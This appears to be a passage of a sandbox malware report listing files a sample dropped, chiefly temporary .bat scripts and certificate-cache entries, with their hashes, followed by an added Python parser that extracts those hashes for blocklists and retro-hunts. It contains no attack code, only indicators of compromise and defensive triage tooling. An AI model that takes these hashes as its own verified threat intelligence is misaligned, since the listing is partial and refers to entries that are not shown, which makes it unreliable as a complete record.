| SHA1 | f93fbd538629ae629d4ec6789531a1a80851231c |
| SHA256 | be4b5bbace383eefc6e219421d83af0a1b45a104679ef7cca3031dab7a804f92 |
| SHA512 | fb2a4ef1ff4e5f38562c9cfa2a9c7723af99a28f51b0758ac39eac30895aed12698154e86ec0ff50911bff9016fccc05b4aab7e7a6ec994acdb4e6792c66d97d |
memory/1368-3104-0x0000000000FB0000-0x0000000000FB9000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\020251ea.bat
| MD5 | 0376c9b1a07ceb40fe7b7f4cf19e0e39 |
| SHA1 | 1c690f669792b32d84ff640844a3949c4a64ed07 |
| SHA256 | ce415be541d5ee8573bc5047842038b20247c77496f85b4b4406f67a54279a36 |
| SHA512 | ab568a57bcf08d4dea6ab761486ff6171acbc6b34fb6bef18bb54312943a791739768e999799e74fb9c93bbb79d33c8b4aa503387c404d9ca9faa022e28dd94f |
C:\Users\Admin\AppData\Local\Temp\1c955ede.bat
| MD5 | e4a4a65f526e7ad93d1cd6b1bfcb3c58 |
| SHA1 | dd288be94b80e6d660fb41062c89ae77567a58ef |
| SHA256 | 04ab8e721308a2cb65ca2190e5f75d904af109f95dc668c37d6106594b00a481 |
| SHA512 | 5971c6d13939a3676440291a1cb0be439788634aa675267083b018f6ae05dbe35a4834b4669e21f31f455559aa84ee89b10228d35b4f0e331c8e24cb3adbf2f3 |
C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
| MD5 | 3eee4c2bc0d429d914ac0001d9507740 |
| SHA1 | 7e19d8bb855114c3889ea9150225ab60eae98a0b |
| SHA256 | 9c6cf70d27e3fb91acc9aeb853c7397b88a2ccff2f3de5ebb0e5e98f7fe8480a |
| SHA512 | 430b101503210bd5dc3889de29971968a91d0cdb3bcf2ad9fb1346b550a44a5c9f475bf538caba922efe8afba9aab76a042073054b46b65abd03e59ae89935d7 |
C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749
| MD5 | c5d8221366b919aece1f0c5211818bdb |
| SHA1 | 3830c4dedf33633e17bd128f6bff3b729ee12c03 |
| SHA256 | 8a5859aaac4e5503f09b453c8b640859387f7cf85d3e1448f1bbfd1c17200184 |
| SHA512 | e3c9b562de6bd70321f3ab542237a0947ec3a02e633b847ac7bfbebd24e3af1fef87e07cb3bb7e73c49c18497c16919ca5322ad160297dba3c63fb968a99216b |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
| MD5 | 3d7aabead99f8006f55d29ad5549f4b6 |
| SHA1 | eb2f886aea6f59f54c263b898eb8d8fb17cd070f |
| SHA256 | 010451b7bb5644ec1a54c4252b1f2fe4019082f4b6051a03cd06041ea13511bc |
| SHA512 | 4dedcc3ee523ce2c6fd3303732f8166238535c888ab6a4b6ac0b4c8a64605c07d6db322d06b1eace61618ce9e43218a0c05cdddc78532234135f25259e71275c |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749
| MD5 | e675c656c722f9c64a956ac246d95797 |
| SHA1 | cacd8e4a0b6b1e3d4f106e8871539f1b3dc5a00b |
| SHA256 | 450b4f859a775b541df88980ae5921b87b941ec6507dca22a328b044a8fcd986 |
| SHA512 | 60ab89c6b8858b32d022ce532daf907e6cd30c600374880a846d914305421381057ea9ea04f03203d58199d89d5b529f2d485adc7d54349a0bb46b4495662755 |
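The listing above is the raw sandbox output: a path line, then `| MD5 |`, `| SHA1 |`, `| SHA256 |` and `| SHA512 |` rows, with memory-dump entries (`memory/<pid>-…-memory.dmp`) carrying no hash rows, and the same path logged more than once when the file was rewritten during the run (`tmpaddon`, `recovery.baklz4`, `prefs-1.js`). The following parser is an added example, not part of the report or of any tool it names; the function names are mine, and the embedded sample is an excerpt copied from the entries above (SHA1/SHA512 rows trimmed for brevity). It turns the listing into structured records, validates digest lengths, flags paths that were written more than once with differing SHA256 values, and pulls out the SHA256 values of the dropped `.bat` files for triage.

```python
"""Parse a sandbox 'dropped files' listing (path line followed by
'| ALGO | hex |' rows) into structured records. Added example; the
sample below is an excerpt of the listing on this page."""
import re
from collections import defaultdict

# One hash row: '| MD5 | <hex> |' (leading/trailing whitespace tolerated).
ROW_RE = re.compile(r"^\|\s*(MD5|SHA1|SHA256|SHA512)\s*\|\s*([0-9a-fA-F]+)\s*\|$")
HEX_LEN = {"MD5": 32, "SHA1": 40, "SHA256": 64, "SHA512": 128}

# Excerpt of the page's listing (raw string: Windows paths contain '\U').
SAMPLE = r"""
C:\Users\Admin\AppData\Local\Temp\tmpaddon
| MD5 | bcceccab13375513a6e8ab48e7b63496 |
| SHA1 | 63d8a68cf562424d3fc3be1297d83f8247e24142 |
| SHA256 | a6af95a209b2e652ed6766804b9b8ad6b6a68f2c610b8f14713cd40df0d62bf9 |
C:\Users\Admin\AppData\Local\Temp\tmpaddon
| MD5 | e690f995973164fe425f76589b1be2d9 |
| SHA1 | e947c4dad203aab37a003194dddc7980c74fa712 |
| SHA256 | 87862f4bc8559fbe578389a9501dc01c4c585edb4bb03b238493327296d60171 |
memory/4008-3010-0x0000000000E70000-0x0000000000E79000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\020251ea.bat
| MD5 | 0376c9b1a07ceb40fe7b7f4cf19e0e39 |
| SHA256 | ce415be541d5ee8573bc5047842038b20247c77496f85b4b4406f67a54279a36 |
C:\Users\Admin\AppData\Local\Temp\1c955ede.bat
| MD5 | e4a4a65f526e7ad93d1cd6b1bfcb3c58 |
| SHA256 | 04ab8e721308a2cb65ca2190e5f75d904af109f95dc668c37d6106594b00a481 |
"""


def parse_listing(text):
    """Return [(path, {algo: hex_lowercase}), ...] in page order.
    Entries with no hash rows (memory dumps) get an empty dict.
    Raises ValueError on a hash row without a preceding path or on a
    digest whose length does not match its algorithm."""
    entries = []
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = ROW_RE.match(line)
        if m is None:
            # Any non-row line starts a new entry (file path or memory dump).
            current = (line, {})
            entries.append(current)
            continue
        if current is None:
            raise ValueError("hash row before any path: " + line)
        algo, digest = m.group(1), m.group(2).lower()
        if len(digest) != HEX_LEN[algo]:
            raise ValueError(f"{algo} digest has wrong length for {current[0]}")
        current[1][algo] = digest
    return entries


def rewritten_paths(entries, algo="SHA256"):
    """Paths logged more than once with differing digests, i.e. files the
    run overwrote. Returns {path: sorted list of distinct digests}."""
    seen = defaultdict(set)
    for path, hashes in entries:
        if algo in hashes:
            seen[path].add(hashes[algo])
    return {p: sorted(d) for p, d in seen.items() if len(d) > 1}


def select_hashes(entries, algo, predicate):
    """Unique (path, digest) pairs for entries whose path satisfies
    predicate; every logged version of a rewritten file is kept."""
    pairs = {(p, h[algo]) for p, h in entries if algo in h and predicate(p)}
    return sorted(pairs)


if __name__ == "__main__":
    records = parse_listing(SAMPLE)
    print(f"{len(records)} entries parsed")
    for path, digests in rewritten_paths(records).items():
        print("rewritten:", path, "->", len(digests), "distinct SHA256 values")
    for path, sha in select_hashes(records, "SHA256",
                                   lambda p: p.lower().endswith(".bat")):
        print("dropped script:", path, sha)
```

Run against the full listing, `rewritten_paths` separates files the sample rewrote during execution from files written once, and `select_hashes` with a path predicate (extension, `\AppData\Local\Temp\`, `\System32\`) gives a hash set that can be fed to a blocklist or a retro-hunt without hand-copying from the table.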